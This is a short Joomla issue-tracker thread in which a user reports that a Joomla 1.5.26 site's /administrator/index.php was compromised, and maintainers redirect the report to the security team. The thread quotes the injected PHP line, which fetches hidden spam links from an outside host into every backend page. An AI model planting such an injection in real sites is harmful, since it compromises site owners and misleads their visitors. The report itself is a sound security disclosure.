Joomla! Issue Tracker - J!Tracker

Download
Launch
Feeling Lucky

[#114] - security incident

000-CMS
avatar b0rek
b0rek
30 May 2013

Hi, just stumbled across strange thing. During adding content to my friends site I've noticed extra text line with PHP command at the end of every backend page. It is include of hidden div with links to some sites and pumping up page rank in mind I think. Disturbing question is: how it was added. Site is fairly often updated, hosting company has security in mind. Googling added link shows that many Joomla sites are affected. I think JSST should look into it.

info:
Joomla 1.5.26 with only 2 person access

line added:
echo file_get_contents('### denetci.gen.tr ###');

file affected 2013-04-06:
/administrator/index.php

PS
Thanks for great job!

avatar b0rek b0rek - open - 30 May 2013
avatar b0rek b0rek - open - 30 May 2013
avatar mbabker
mbabker - comment - 30 May 2013

Hello,

This GitHub project is for the Joomla Issue Tracker project and isn't associated with CMS development. If you feel there is a security concern in currently supported versions of the Joomla CMS, please send an e-mail to security@joomla.org with details, including a proof of concept, and the JSST can investigate the issue.

Please ensure you are running the latest version of Joomla! by going to our website at http://www.joomla.org and verify for any known vulnerable extensions at http://vel.joomla.org and Please refer to and action http://docs.joomla.org/Security_Checklist_7

Please note: JSST, Joomla! and Open Source Matters, are not able to recommend a specific person, or company for assistance.

avatar - close - 30 May 2013
avatar mbabker mbabker - close - 30 May 2013
avatar b2z
b2z - comment - 30 May 2013

Or you can post your question here:
http://forum.joomla.org/viewforum.php?f=432

Add a Comment

Login with GitHub to post a comment